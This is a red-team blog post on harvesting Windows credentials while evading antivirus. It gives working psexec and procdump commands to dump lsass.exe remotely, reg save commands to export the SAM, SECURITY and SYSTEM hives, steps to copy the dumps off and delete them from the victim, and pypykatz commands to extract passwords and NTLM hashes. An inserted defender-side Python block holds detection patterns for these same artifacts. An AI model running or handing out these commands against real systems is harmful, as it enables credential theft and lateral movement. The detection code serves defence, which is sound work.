Evading Antivirus When Dumping Passwords Remotely


During Red Team engagements, I frequently gain RCE (remote code execution) on a host using credentials gained in an earlier step of the attack. This RCE could come in the form of psexec, SQL commands or even a full Remote Desktop session. One of my first objectives at this point is to determine whether endpoint security (antivirus) software is installed on the remote victim. If it is not, I'll typically run mimikatz.

If endpoint security software is installed, it's generally still a trivial task to harvest credentials by dumping lsass.exe and the SAM. This sort of dump is often not blocked by antivirus (I tested several products). My post focuses on how to perform the dumps with psexec and how to parse the output with pypykatz. I demonstrate this in a lab environment, authenticating to the victim with psexec and dumping remotely.


Test environment

This attack could be done with only one attack machine, but I used two attack VMs:

1. Windows 10 - Uses psexec to perform the dumps remotely

2. Kali Linux 2020.3 - Runs pypykatz to parse the files for credentials

The victim VM was running Windows 10.


The Attack

After downloading procdump and psexec to the Windows attack box, I performed the remote lsass.exe dump against the remote victim:


psexec \\192.168.0.100 -u testuser -p password123 -e -h -s -c procdump -accepteula -ma lsass.exe c:\lsass.dmp

Note that the -c option copies procdump to the remote victim, which keeps things simple. That dump is enough to recover the credentials held in RAM, but I want to get the SAM as well:

psexec \\192.168.0.100 -u testuser -p password123 -e -h -s cmd /c reg save hklm\system c:\sys.hiv ^& reg save hklm\security c:\sec.hiv ^& reg save hklm\sam c:\sam.hiv


Notice the ^ that escapes the &, so the local shell passes it through to the remote cmd /c rather than interpreting it itself. Now it's time to download the l00t:

net use x: /user:testuser \\192.168.0.100\c$ password123
copy x:\lsass.dmp
copy x:\*.hiv
del x:\lsass.dmp x:\sam.hiv x:\sec.hiv x:\sys.hiv

This completes the active portion of the attack, and the rest involves parsing the resulting files.
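The sequence above leaves a recognisable trail on the victim: a PSEXESVC service install, procdump writing an lsass minidump as a child of the PsExec service, and reg.exe exporting the SAM, SECURITY and SYSTEM hives. As an added defender-side example that is not from the original post, here is a small Python matcher that flags those artifacts; the events are constructed dicts whose field names follow the Sysmon schema (EventID 1) plus a System-log 7045 service-install record, not real telemetry.

```python
import re

# Constructed Sysmon-style events (not real telemetry) modelled on the commands
# in the post: a PSEXESVC service install (System log 7045), procdump minidumping
# lsass under the PsExec service, and reg.exe exporting the SAM hive.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\procdump.exe", "ParentImage": "C:\\Windows\\PSEXESVC.exe",
     "CommandLine": "procdump -accepteula -ma lsass.exe c:\\lsass.dmp"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "reg save hklm\\sam c:\\sam.hiv"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "reg query hklm\\software\\microsoft\\windows\\currentversion"},  # benign
]

# (rule name, predicate over one event). Regexes are case-insensitive because
# reg.exe and procdump accept any casing and operators vary it.
RULES = [
    ("psexec_service_install",
     lambda e: e.get("EventID") == 7045 and e.get("ServiceName", "").upper() == "PSEXESVC"),
    ("lsass_minidump_via_procdump",
     lambda e: e.get("EventID") == 1
     and re.search(r"-ma\s+lsass(\.exe)?\b", e.get("CommandLine", ""), re.I) is not None),
    ("credential_hive_export",
     lambda e: e.get("EventID") == 1
     and re.search(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b",
                   e.get("CommandLine", ""), re.I) is not None),
    ("process_spawned_by_psexec_service",
     lambda e: e.get("EventID") == 1
     and e.get("ParentImage", "").lower().endswith("\\psexesvc.exe")),
]

def match_events(events):
    """Return [(rule_name, event), ...] for every event that trips a rule."""
    hits = []
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits.append((name, event))
    return hits

def triggered_rules(events):
    """Distinct rule names hit, sorted; all four firing on one host within
    minutes is the pattern the post's procedure produces."""
    return sorted({name for name, _ in match_events(events)})

if __name__ == "__main__":
    for name, event in match_events(SAMPLE_EVENTS):
        print(name, "->", event.get("CommandLine") or event.get("ServiceName"))
```

The benign reg query event is included so the hive rule can be seen not to fire on ordinary registry reads; tuning against a real baseline is still needed before alerting on the SYSTEM hive alone.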


Parsing

I decided to use my Kali box to parse the files because pypykatz is preinstalled there. I used VMware's shared-folder feature to move the files from the Windows VM guest to the host. I hadn't set up the VMware shared folder on my Kali machine yet, so I used these steps to do that:

1. mkdir /mnt/hgfs
2. Add this to /etc/fstab:
vmhgfs-fuse    /mnt/hgfs    fuse    defaults,allow_other    0    0
3. mount -a
4. cd /mnt/hgfs 

Next, I used pypykatz to parse the files:

5. pypykatz lsa minidump lsass.dmp
6. pypykatz registry --sam sam.hiv --security sec.hiv sys.hiv

Depending on various factors, you may end up harvesting cleartext passwords (as shown in the first screenshot above) or NTLM password hashes.



If you prefer to use mimikatz for this parsing, the commands can be found here: https://www.vanimpe.eu/2019/03/07/mimikatz-and-hashcat-in-practice/


